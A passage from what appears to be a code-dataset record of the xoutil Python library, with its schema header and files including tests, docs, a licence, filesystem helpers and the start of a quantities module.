repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
merchise-autrement/xoutil
https://github.com/merchise-autrement/xoutil
c049636c930426dfe0c22aad0b1bffa373ffc7c9
afe1e2f2baa936b4561dc95dcea158050e8a2193
c401e473c11ec0ba2695dceed61ccc15397e3e35
refs/heads/master
2020-04-12T01:29:50.013978
2020-03-10T20:12:15
2020-03-10T20:12:15
4,931,268
2
3
null
null
null
null
null
[ { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.6962025165557861, "avg_line_length": 78, "blob_id": "f750326605b355430a3690ce59adc64294858d32", "content_id": "312487f5d3186c8f9ea26096589866a4272fd974", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 79, "license_type": "permissive", "max_line_length": 78, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Incorporates all (applicable) changes from `release 1.9.2 <rel-1.9.2>`:ref:.\n" }, { "alpha_fraction": 0.5045871734619141, "alphanum_fraction": 0.5091742873191833, "avg_line_length": 15.769230842590332, "blob_id": "a0a6481728b81ebc297a72f96d9b84f2bd226037", "content_id": "c4fb0d9575539fbeff97fbf63c7b2163f7c76167", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 218, "license_type": "permissive", "max_line_length": 48, "num_lines": 13, "path": "/docs/source/xotl.tools/validators.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.validators`:mod: -- value validators\n================================================\n\n.. automodule:: xotl.tools.validators\n :members:\n\nContents:\n\n.. 
toctree::\n :maxdepth: 1\n :glob:\n\n validators/*\n" }, { "alpha_fraction": 0.5764994025230408, "alphanum_fraction": 0.5777233839035034, "avg_line_length": 21.08108139038086, "blob_id": "09863126cd3e9a1f2d2659dc2009aca1e8161288", "content_id": "61b01fad7b201c8560b4ac1ec1ec9532c08cc174", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 818, "license_type": "no_license", "max_line_length": 72, "num_lines": 37, "path": "/tests/test_cli.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\n\n\ndef test_regression_Command_repr():\n from xoutil.cli import Command\n\n class MyCommand(Command):\n def run(self):\n pass\n\n class Hidden(object):\n def run(self):\n pass\n\n Command.register(Hidden)\n\n cmd = MyCommand()\n assert repr(cmd) != \"\"\n registry = Command.registry\n assert registry.get(\"my-command\")\n assert registry.get(\"hidden\")\n\n\ndef test_can_actually_run_the_help():\n from xoutil.cli.app import main\n\n with pytest.raises(SystemExit):\n main(default=\"help\")\n" }, { "alpha_fraction": 0.5779816508293152, "alphanum_fraction": 0.5802752375602722, "avg_line_length": 28.066667556762695, "blob_id": "ceaae0cd974ccf443c1a4512a3db05f10f77fa48", "content_id": "d105f18cc7e6ab31a90d133d67f123b9ab4873c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 437, "license_type": "no_license", "max_line_length": 78, "num_lines": 15, "path": "/xotl/tools/fp/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# 
---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Advanced functional programming in Python.\n\n.. note:: This module is in **EXPERIMENTAL** state, we encourage not to use it\n before declared stable.\n\n\"\"\"\n" }, { "alpha_fraction": 0.7225806713104248, "alphanum_fraction": 0.7225806713104248, "avg_line_length": 37.75, "blob_id": "14f4dfc135ee9f5a5b75b5475f81748464afd162", "content_id": "28e5a5eba511ef89a65bac34fe5c9f73a4b61b71", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 155, "license_type": "permissive", "max_line_length": 66, "num_lines": 4, "path": "/docs/source/history/_changes-1.7.7.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fixed bug in `xoutil.datetime.date`:class: that prevented to use\n ``strftime()`` in subclasses.\n\n- Fixed bug in `xoutil.datetime.TimeSpan.valid`:meth:.\n" }, { "alpha_fraction": 0.5492101907730103, "alphanum_fraction": 0.5681652426719666, "avg_line_length": 28.60431671142578, "blob_id": "5d01b23487ef7de2ae4846f766c71b80a675f3f3", "content_id": "36c4fe34c38fed6942ec55f1d39419627acb8bb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4116, "license_type": "no_license", "max_line_length": 79, "num_lines": 139, "path": "/tests/test_fp.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\nfrom hypothesis 
import strategies as s, given, example\n\n\ndef test_fp_compose():\n from xoutil.fp.tools import identity, compose, pos_args, kw_args, full_args\n\n x, obj = 15, object()\n f, g, h = x.__add__, x.__mul__, x.__xor__\n\n def join(*args):\n if args:\n return \" -- \".join(str(arg) for arg in args)\n # functions return 'None' when no explicit 'return' is issued.\n\n def plus2(value):\n return value + 2\n\n def plus2d(value):\n return {\"stop\": value + 2}\n\n def myrange(stop):\n return list(range(stop))\n\n assert compose(join, pos_args, myrange, plus2)(0) == \"0 -- 1\"\n assert compose(join, myrange, plus2)(0) == \"[0, 1]\"\n\n assert compose(join, myrange, kw_args, plus2d)(0) == \"[0, 1]\"\n assert compose(join, myrange, full_args.parse, plus2d)(0) == \"[0, 1]\"\n\n assert compose() is identity\n assert compose()(x) is x\n assert compose()(obj) is obj\n assert compose(f) is f\n assert compose(g, f)(x) == g(f(x))\n assert compose(h, g, f)(x) == h(g(f(x)))\n\n\ndef test_fp_compose_wrapable():\n from functools import wraps\n from xoutil.fp.tools import compose\n\n def wrapper():\n \"X\"\n pass\n\n res = wraps(wrapper)(compose(wrapper, lambda: None))\n assert res.__name__ == wrapper.__name__\n assert res.__doc__ == wrapper.__doc__\n assert res.__module__ == wrapper.__module__\n\n\ndef test_fp_tools():\n from xoutil.fp.tools import identity, compose\n\n x, obj = 15, object()\n f, g, h = x.__add__, x.__mul__, x.__xor__\n\n def join(*args):\n if args:\n return \" -- \".join(str(arg) for arg in args)\n # functions return 'None' when no explicit 'return' is issued.\n\n def plus2(value):\n return value + 2\n\n def plus2d(value):\n return {\"stop\": value + 2}\n\n def myrange(stop):\n return list(range(stop))\n\n assert compose(join, myrange, plus2)(0) == \"[0, 1]\"\n assert compose() is identity\n assert compose()(x) is x\n assert compose()(obj) is obj\n assert compose(f) is f\n assert compose(g, f)(x) == g(f(x))\n assert compose(h, g, f)(x) == h(g(f(x)))\n\n c = 
compose(*((lambda y: lambda x: x + y)(i) for i in range(6)))\n for i in range(7):\n assert c[:i](0) == sum(range(i))\n\n\n@given(s.integers(min_value=0, max_value=20))\n@example(4)\ndef test_fp_kleisli_compose(n):\n from xoutil.fp.iterators import kleisli_compose\n\n def fullrange(n):\n \"[0..n]\"\n return range(n + 1)\n\n def odds(n):\n return [x for x in fullrange(n) if x % 2 != 0]\n\n odd_seqs = kleisli_compose(odds, fullrange)\n assert list(odd_seqs(n)) == [z for y in fullrange(n) for z in odds(y)]\n id_ = lambda x: [x]\n pad = (id_,) * n\n args = pad + (odds,) + pad + (fullrange,) + pad\n odd_seqs = kleisli_compose(*args)\n assert list(odd_seqs(n)) == [z for y in fullrange(n) for z in odds(y)]\n\n odd_seqs = kleisli_compose(fullrange, odds)\n assert list(odd_seqs(n)) == [z for y in odds(n) for z in fullrange(y)]\n args = pad + (fullrange,) + pad + (odds,) + pad\n odd_seqs = kleisli_compose(*args)\n assert list(odd_seqs(n)) == [z for y in odds(n) for z in fullrange(y)]\n\n\ndef test_fp_kleisli_compose4():\n from xoutil.fp.iterators import kleisli_compose\n\n def fullrange(n):\n \"[0..n]\"\n return range(n + 1)\n\n def odds(n):\n return [x for x in fullrange(n) if x % 2 != 0]\n\n id_ = lambda x: [x]\n odd_seqs = kleisli_compose(odds, fullrange)\n assert list(odd_seqs(4)) == [1, 1, 1, 3, 1, 3]\n odd_seqs = kleisli_compose(id_, odds, id_, id_, fullrange, id_)\n assert list(odd_seqs(4)) == [1, 1, 1, 3, 1, 3]\n\n odd_seqs = kleisli_compose(fullrange, odds)\n assert list(odd_seqs(4)) == [0, 1, 0, 1, 2, 3]\n odd_seqs = kleisli_compose(id_, fullrange, id_, id_, odds, id_)\n assert list(odd_seqs(4)) == [0, 1, 0, 1, 2, 3]\n" }, { "alpha_fraction": 0.7778534889221191, "alphanum_fraction": 0.7850084900856018, "avg_line_length": 41.536231994628906, "blob_id": "270688b27d78805e4845c806b490af0d07681640", "content_id": "5870c74e816625f054b6f316b05fa46034ede29b", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, 
"is_vendor": false, "language": "reStructuredText", "length_bytes": 2936, "license_type": "permissive", "max_line_length": 76, "num_lines": 69, "path": "/docs/source/LICENSE.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "Copyright and Licence\n=====================\n\nCopyright (c) 2013-2017 Merchise Autrement [~º/~] and Contributors.\n\nCopyright (c) 2012 Medardo Rodríguez.\n\nThis software is released under terms similar to the Python Software\nFoundation (PSF) licence for Python 3.2 as stated `below\n<merchise-license-psf>`:ref:.\n\nThree modules inside this package are backports from Python 3.2.3's standard\nlibrary and the PSF retains the copyright.\n\n.. |project| replace:: xoutil\n\n.. |copyright| replace:: Copyright (c) 2015 Merchise and Contributors\n\n.. _merchise-license-psf:\n\nLicense Terms\n-------------\n\nThis LICENSE AGREEMENT is between the Copyright Owner (Owner or\nAuthor), and the Individual or Organization (\"Licensee\") accessing and\notherwise using |project| |release| software in source or binary form\nand its associated documentation.\n\nSubject to the terms and conditions of this License Agreement, the\nOwner hereby grants Licensee a nonexclusive, royalty-free, world-wide\nlicense to reproduce, analyze, test, perform and/or display publicly,\nprepare derivative works, distribute, and otherwise use |project|\n|release| alone or in any derivative version, provided, however, that\nOwner's License Agreement and Owner's notice of copyright, i.e.,\n\"|copyright|\" are retained in |project| |release| alone or in any\nderivative version prepared by Licensee.\n\nIn the event Licensee prepares a derivative work that is based on or\nincorporates |project| |release| or any part thereof, and wants to\nmake the derivative work available to others as provided herein, then\nLicensee hereby agrees to include in any such work a brief summary of\nthe changes made to |project| |release|.\n\nThe Owner is making |project| 
|release| available to Licensee on an\n\"AS IS\" basis. THE OWNER MAKES NO REPRESENTATIONS OR WARRANTIES,\nEXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, THE OWNER\nMAKES NO AND DISCLAIMS ANY REPRESENTATION OR WARRANTY OF\nMERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE USE\nOF |project| |release| WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.\n\nTHE OWNER SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF\n|project| |release| FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL\nDAMAGES OR LOSS AS A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE\nUSING |project| |release|, OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED\nOF THE POSSIBILITY THEREOF.\n\nThis License Agreement will automatically terminate upon a material\nbreach of its terms and conditions.\n\nNothing in this License Agreement shall be deemed to create any\nrelationship of agency, partnership, or joint venture between The\nOwner and Licensee. This License Agreement does not grant permission\nto use The Owner trademarks or trade name in a trademark sense to\nendorse or promote products or services of Licensee, or any third\nparty.\n\nBy copying, installing or otherwise using |project| |release|,\nLicensee agrees to be bound by the terms and conditions of this\nLicense Agreement.\n" }, { "alpha_fraction": 0.464530885219574, "alphanum_fraction": 0.471395879983902, "avg_line_length": 42.70000076293945, "blob_id": "064a0590cd650dc9026a2bb28b71b83ec31aa098", "content_id": "d52e0c4db02731e07a23cd95e2978f1ba3bfc180", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 437, "license_type": "permissive", "max_line_length": 81, "num_lines": 10, "path": "/docs/source/xotl.tools/fp/iterators.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=============================================================================\n 
`xotl.tools.fp.iterators`:mod: -- High-level functional tools for iterators\n=============================================================================\n\n.. automodule:: xotl.tools.fp.iterators\n :members: kleisli_compose, kleisli_compose_foldl\n\n.. function:: iter_compose\n\n .. deprecated:: 1.9.7 Alias of `xotl.tools.fp.iterators.kleisli_compose`:func:\n" }, { "alpha_fraction": 0.5839133262634277, "alphanum_fraction": 0.5877872705459595, "avg_line_length": 28.63035011291504, "blob_id": "41093e7ee270858ef47933a989a11799c32987d3", "content_id": "6e5e226c1c90b967ed8c800afd0ca6e96417ba6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15232, "license_type": "no_license", "max_line_length": 87, "num_lines": 514, "path": "/xotl/tools/fs/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"File system utilities.\n\nThis module contains file-system utilities that could have side-effects. 
For\npath-handling functions that have no side-effects look at\n`xotl.tools.fs.path`:mod:.\n\n\"\"\"\n\n\nimport sys\nimport os\nfrom re import compile as _rcompile\nfrom xotl.tools.fs.path import normalize_path\n\n\nre_magic = _rcompile(\"[*?[]\")\nhas_magic = lambda s: re_magic.search(s) is not None\n\n\ndef _get_regex(pattern=None, regex_pattern=None, shell_pattern=None):\n from functools import reduce\n import fnmatch\n from xotl.tools.params import check_count\n\n arg_count = reduce(\n lambda count, p: count + (1 if p is not None else 0),\n (pattern, regex_pattern, shell_pattern),\n 0,\n )\n check_count(arg_count, 0, 1, caller=\"_get_regex\") # XXX: WTF?!\n if arg_count == 1:\n if pattern is not None:\n if pattern.startswith(\"(?\") or pattern.startswith(\"^(?\"):\n regex_pattern = pattern\n else:\n shell_pattern = pattern\n return _rcompile(regex_pattern or fnmatch.translate(shell_pattern))\n elif arg_count == 0:\n return None\n\n\ndef iter_files(\n top=\".\",\n pattern=None,\n regex_pattern=None,\n shell_pattern=None,\n followlinks=False,\n maxdepth=None,\n):\n \"\"\"Iterate filenames recursively.\n\n :param top: The top directory for recurse into.\n :param pattern: A pattern of the files you want to get from the iterator.\n It should be a string. If it starts with \"(?\" it will be\n regarded as a regular expression, otherwise a shell\n pattern.\n\n :param regex_pattern: An *alternative* to `pattern`. This will always be\n regarded as a regular expression.\n\n :param shell_pattern: An *alternative* to `pattern`. This should be a\n shell pattern.\n\n :param followlinks: The same meaning that in `os.walk`.\n\n :param maxdepth: Only files above this level will be yielded. If None, no\n limit is placed.\n\n .. warning:: It's an error to pass more than pattern argument.\n\n .. 
versionchanged:: 1.2.1 Added parameters `followlinks` and `maxdepth`.\n\n \"\"\"\n regex = _get_regex(pattern, regex_pattern, shell_pattern)\n depth = 0\n for dirpath, _dirs, filenames in os.walk(\n normalize_path(top), topdown=True, followlinks=followlinks\n ):\n for filename in filenames:\n path = os.path.join(dirpath, filename)\n if (regex is None) or regex.search(path):\n yield path\n if maxdepth is not None:\n depth += 1\n if depth >= maxdepth:\n _dirs[:] = []\n\n\n# ------------------------------ iter_dict_files ------------------------------\n_REGEX_PYTHON_PACKAGE = _rcompile(\n r\"^(?P<dir>.+(?=/)/)?\"\n r\"(?P<packagename>[^/_-]+?)\"\n r\"([-_][Vv]?(?P<version>\\d+([.-_]\\w+)*))?\"\n r\"(?P<ext>[.](tar[.](gz|bz2)|zip|egg|tgz))$\"\n)\n\n_REGEX_DEFAULT_ALLFILES = _rcompile(\n r\"^(?P<dir>.+(?=/)/)?\" r\"(?P<filename>[^/]+?)\" r\"([.](?P<ext>[^.]+))?$\"\n)\n\n\ndef iter_dict_files(top=\".\", regex=None, wrong=None, followlinks=False):\n \"\"\"\n Iterate filenames recursively.\n\n :param top: The top directory for recurse into.\n\n :param regex: Regular expression with group definitions to match.\n\n :param wrong: A key to store full name of not matching files.\n\n :param followlinks: The same meaning that in `os.walk`.\n\n .. versionadded:: 1.2.0\n\n .. 
versionchanged:: 1.2.1 Added parameter `followlinks`.\n\n \"\"\"\n if regex:\n if isinstance(regex, str):\n regex = _rcompile(regex)\n else:\n regex = _REGEX_DEFAULT_ALLFILES\n for dirpath, _dirs, filenames in os.walk(\n normalize_path(top), followlinks=followlinks\n ):\n for filename in filenames:\n path = os.path.join(dirpath, filename)\n match = regex.match(path)\n if match:\n yield match.groupdict()\n elif wrong is not None:\n yield {wrong: path}\n\n\ndef iter_dirs(top=\".\", pattern=None, regex_pattern=None, shell_pattern=None):\n \"\"\"\n Iterate directories recursively.\n\n The params have analagous meaning that in `iter_files`:func: and the same\n restrictions.\n\n \"\"\"\n regex = _get_regex(pattern, regex_pattern, shell_pattern)\n for path, _dirs, _files in os.walk(normalize_path(top)):\n if (regex is None) or regex.search(path):\n yield path\n\n\ndef rmdirs(\n top=\".\",\n pattern=None,\n regex_pattern=None,\n shell_pattern=None,\n exclude=None,\n confirm=None,\n):\n \"\"\"Removes all empty dirs at `top`.\n\n :param top: The top directory to recurse into.\n\n :param pattern: A pattern of the dirs you want to remove.\n It should be a string. If it starts with \"(?\" it will be\n regarded as a regular expression, otherwise a shell\n pattern.\n\n :param exclude: A pattern of the dirs you DON'T want to remove. It should\n be a string. If it starts with \"(?\" it will be regarded as\n a regular expression, otherwise a shell pattern. This is a\n simple commodity to have you not to negate complex\n patterns.\n\n :param regex_pattern: An *alternative* to `pattern`. This will always be\n regarded as a regular expression.\n\n :param shell_pattern: An *alternative* to `pattern`. This should be a\n shell pattern.\n\n :param confirm: A callable that accepts a single argument, which is\n the path of the directory to be deleted. `confirm`\n should return True to allow the directory to be\n deleted. If `confirm` is None, then all matched dirs\n are deleted.\n\n .. 
note:: In order to avoid common mistakes we won't attempt to\n remove mount points.\n\n .. versionadded:: 1.1.3\n\n \"\"\"\n regex = _get_regex(pattern, regex_pattern, shell_pattern)\n exclude = _get_regex(exclude)\n if confirm is None:\n confirm = lambda _: True\n for path, _dirs, _files in os.walk(normalize_path(top)):\n # XXX: Make clearest next condition\n if (\n (regex is None or regex.search(path))\n and (exclude is None or not exclude.search(path))\n and not _dirs\n and not _files\n and confirm(path)\n and not os.path.ismount(path)\n ):\n os.rmdir(path)\n\n\ndef regex_rename(top, pattern, repl, maxdepth=None):\n \"\"\"Rename files recursively using regular expressions substitution.\n\n :param top: The top directory to start walking.\n\n :param pattern: A regular expression pattern. Files whose fullname\n (including the path) match the expression will be renamed.\n\n :param repl: String to use as replacement. You may use backreferences as\n documented in python's ``re.sub`` function.\n\n :param maxdepth: Only walk files up to this level. If None, walk all\n files.\n\n .. 
versionadded:: 1.2.1\n\n \"\"\"\n from re import subn as _re_subn\n\n if isinstance(pattern, str):\n pattern = _rcompile(pattern)\n depth = 0\n for path, _dirs, files in os.walk(top):\n for item in files:\n new_file, count = _re_subn(pattern, repl, item)\n if count > 0:\n old = os.path.join(path, item)\n new = os.path.join(path, new_file)\n os.rename(old, new)\n if maxdepth is not None:\n depth += 1\n if depth >= maxdepth:\n _dirs[:] = []\n\n\nfilter_not_hidden = lambda path, _st: (path[0] != \".\") and (\"/.\" not in path)\nfilter_false = lambda path, stat_info: False\n\n\ndef get_regex_filter(regex):\n \"\"\"Return a filter for \"walk\" based on a regular expression.\"\"\"\n if isinstance(regex, str):\n regex = _rcompile(regex)\n\n def _filter(path, stat_info):\n return regex.match(os.path.basename(path)) is not None\n\n return _filter\n\n\ndef get_wildcard_filter(pattern):\n \"\"\"Return a filter for \"walk\" based on a wildcard pattern a la fnmatch.\"\"\"\n regex = _get_regex(pattern)\n\n def _filter(path, stat_info):\n return regex.match(os.path.basename(path)) is not None\n\n return _filter\n\n\ndef get_mime_filter(mime_start):\n import mimetypes\n\n def _filter(path, stat_info):\n t = mimetypes.guess_type(path)[0]\n return t.startswith(mime_start) if t else False\n\n return _filter\n\n\ndef nice_size(size):\n \"\"\"Formats `size` to a nice human-friendly format by appending one of `Kilo`,\n `Mega`, `Giga`, `Tera`, `Peta`, or `Eta` suffix.\n\n \"\"\"\n tails = \" KMGTPE\"\n order, highest = 0, len(tails) - 1\n while (size >= 1024) and (order < highest):\n size /= 1024\n order += 1\n res = (\"%.2f\" % size).rstrip(\"0\").rstrip(\".\")\n return \"%s%s\" % (res, tails[order])\n\n\ndef stat(path):\n \"\"\"\n Return file or file system status.\n\n This is the same as the function ``os.stat`` but raises no error.\n \"\"\"\n try:\n return os.stat(path)\n except os.error:\n return None\n\n\ndef lstat(path):\n \"\"\"Same as `os.lstat`, but raises no error.\"\"\"\n 
try:\n return os.lstat(path)\n except os.error:\n return None\n\n\ndef set_stat(fname, stat_info):\n os.chmod(fname, stat_info.st_mode)\n os.chown(fname, stat_info.st_uid, stat_info.st_gid)\n os.utime(fname, (stat_info.st_atime, stat_info.st_mtime))\n\n\ndef read_file(path):\n \"\"\"Read a full file content and return an string.\"\"\"\n try:\n with open(path, \"r\") as f:\n return f.read()\n except OSError:\n return \"\"\n\n\ndef listdir(path):\n \"\"\"Same as ``os.listdir`` but normalizes `path` and raises no error.\"\"\"\n try:\n return os.listdir(normalize_path(path))\n except os.error:\n return []\n\n\ndef _list_magic(dirname, pattern):\n re = _get_regex(pattern)\n for name in listdir(dirname or os.curdir):\n if re.match(name):\n full = os.path.join(dirname, name)\n yield full, lstat(full)\n\n\ndef _list_one(fname):\n st = lstat(fname)\n if st:\n yield fname, st\n\n\ndef _list(pattern):\n from stat import S_ISDIR as _ISDIR\n\n if has_magic(pattern):\n head, tail = os.path.split(pattern)\n for dirname, st in _list(head):\n if _ISDIR(st.st_mode):\n if has_magic(tail):\n items = _list_magic(dirname, tail)\n elif tail:\n items = _list_one(os.path.join(dirname, tail))\n else:\n items = ((dirname, st),)\n for item in items:\n yield item\n elif pattern:\n for item in _list_one(pattern):\n yield item\n else:\n yield (\"\", lstat(os.curdir))\n\n\ndef imap(func, pattern):\n r\"\"\"Yields `func(file_0, stat_0)`, `func(file_1, stat_1)`, ... for each dir\n path. The `pattern` may contain:\n\n - Simple shell-style wild-cards à la `fnmatch`.\n\n - Regex if pattern starts with '(?'. Expressions must be valid, as\n in \"(?:[^.].*)$\" or \"(?i).*\\.jpe?g$\". 
Remember to add the end mark '$'\n if needed.\n\n \"\"\"\n for item, st in _list(pattern):\n res = func(item, st)\n if res is not None:\n yield res\n\n\ndef walk_up(start, sentinel):\n \"\"\"Given a `start` directory walk-up the file system tree until either the\n FS root is reached or the `sentinel` is found.\n\n The `sentinel` must be a string containing the file name to be found.\n\n .. warning:: If `sentinel` is an absolute path that exists this will return\n `start`, no matter what `start` is (in windows this could be even\n different drives).\n\n If `start` path exists but is not a directory an OSError is raised.\n\n \"\"\"\n from os.path import abspath, exists, isdir, join, dirname\n\n current = abspath(start)\n if not exists(current) or not isdir(current):\n raise OSError('Invalid directory \"%s\"' % current)\n previouspath = None\n found = False\n while not found and current is not previouspath:\n clue = join(current, sentinel)\n if exists(clue):\n found = True\n else:\n previouspath = current\n current = dirname(current)\n return current if found else None\n\n\nfrom os import makedirs\n\n\ndef ensure_filename(filename, yields=False):\n \"\"\"Ensures the existence of a file with a given filename.\n\n If the filename is taken and is not pointing to a file (or a link to a\n file) an OSError is raised. If `exist_ok` is False the filename must not\n be taken; an OSError is raised otherwise.\n\n The function creates all directories if needed. See `makedirs`:func: for\n restrictions.\n\n If `yields` is True, returns the file object. This way you may open a\n file for writing like this::\n\n with ensure_filename('/tmp/good-name-87.txt', yields=True) as fh:\n fh.write('Do it!')\n\n The file is open in mode 'w+b'.\n\n .. 
versionadded:: 1.6.1 Added parameter `yield`.\n\n \"\"\"\n if not os.path.exists(filename):\n filename = normalize_path(filename)\n dirname = os.path.dirname(filename)\n makedirs(dirname, exist_ok=True)\n # TODO: Better hanlding of mode for reading/writing.\n fh = open(filename, \"w+b\")\n if not yields:\n fh.close()\n else:\n return fh\n else:\n if not os.path.isfile(filename):\n raise OSError(\"Expected a file but another thing is found '%s'\" % filename)\n\n\ndef concatfiles(*files):\n \"\"\"Concat several files to a single one.\n\n Each positional argument must be either:\n\n - a file-like object (ready to be passed to `shutil.copyfileobj`:func:)\n\n - a string, the file path.\n\n The last positional argument is the target. If it's file-like object it\n must be open for writing, and the caller is the responsible for closing\n it.\n\n Alternatively if there are only two positional arguments and the first is\n a collection, the sources will be the members of the first argument.\n\n \"\"\"\n import shutil\n from xotl.tools.values.simple import force_iterable_coerce\n from xotl.tools.params import check_count\n\n check_count(files, 2, caller=\"concatfiles\")\n if len(files) == 2:\n files, target = force_iterable_coerce(files[0]), files[1]\n else:\n files, target = files[:-1], files[-1]\n if isinstance(target, str):\n target, opened = open(target, \"wb\"), True\n else:\n opened = False\n try:\n for f in files:\n if isinstance(f, str):\n fh = open(f, \"rb\")\n closefh = True\n else:\n fh = f\n closefh = False\n try:\n shutil.copyfileobj(fh, target)\n finally:\n if closefh:\n fh.close()\n finally:\n if opened:\n target.close()\n\n\ndel sys\n" }, { "alpha_fraction": 0.5676842927932739, "alphanum_fraction": 0.571664571762085, "avg_line_length": 30.703571319580078, "blob_id": "c525bd504844888e0a060ba502fa63291c480992", "content_id": "fb79a0fa85331dc63daa53dd0496dcba0eecdc43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 26633, "license_type": "no_license", "max_line_length": 87, "num_lines": 840, "path": "/xotl/tools/dim/meta.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nr\"\"\"Facilities to work with `concrete numbers`_.\n\n A concrete number is a number associated with the things being counted, in\n contrast to an abstract number which is a number as a single entity.\n\n -- Wikipedia__\n\n\n__ `concrete numbers`_\n.. _concrete numbers: https://en.wikipedia.org/wiki/Concrete_number\n\n\nThis module allows you to define dimensions (or quantity types):\n\n >>> from xotl.tools.dim.meta import Dimension, UNIT\n >>> @Dimension.new\n ... class Length:\n ... metre = UNIT\n ... kilometre = 1000 * metre\n ... centimetre = metre/100\n ... milimetre = milimetres = metre/1000\n ...\n ... inch = inches = 24.5 * milimetres\n ... foot = feet = 12 * inches\n\n\n.. seealso:: Module `~xotl.tools.dim.base`:mod: defines the standard base\n quantities.\n\n\nEach dimension **must** define a single *canonical unit* for measuring\nquantities within the dimension. Values in the dimension are always expressed\nin terms of the canonical units.\n\nIn the previous example the dimension Length defined the `metre` for its\ncanonical unit. The name of canonical unit defines the `signature\n<Signature>`:class: for the quantities in the dimension.\n\nWhen printed (or ``repr``-ed) `quantities <Quantity>`:class: use the format\n``<magnitude>::<signature>``:\n\n >>> metre = Length.metre\n >>> metre\n 1::{<Length.metre>}/{}\n\nQuantities support the standard arithmetical operations of addition,\nsubtraction, multiplication and division. 
In fact, you obtain different\nquantities in the dimension by multiplying with the canonical unit:\n\n >>> metre + metre\n 2::{<Length.metre>}/{}\n\n >>> metre*metre\n 1::{<Length.metre>, <Length.metre>}/{}\n\n >>> km = 1000 * metre\n\n >>> 5 * km\n 5000::{<Length.metre>}/{}\n\n`Dimensional homogeneity`__ imposes restrictions on the allowed operations\nbetween quantities. Only commensurable quantities (quantities of the same\ndimension) can be compared, equated, added, or subtracted.\n\n__ https://en.wikipedia.org/wiki/Dimensional_analysis#Dimensional_homogeneity\n\n >>> @Dimension.new\n >>> class Time:\n ... second = UNIT\n\n >>> metre + Time.second # doctest: +ELLIPSIS\n Traceback (...)\n ...\n OperandTypeError: unsupported operand type(s) for +:...\n\n\nHowever, you can take ratios of incommensurable quantities (quantities with\ndifferent dimensions), and multiply or divide them.\n\n >>> metre/Time.second\n >>> 1::{<Length.metre>}/{<Time.second>}\n\n\n.. warning:: `Decimal numbers <decimal.Decimal>`:py:class: are not supported.\n\n This module makes not attempt to fix the standing incompatibility between\n floats and `decimal.Decimal`:py:class:\\ :\n\n >>> import decimal\n >>> decimal.Decimal('0') + 0.1 # doctest: +ELLIPSIS\n Traceback (...)\n ...\n TypeError: unsupported operand 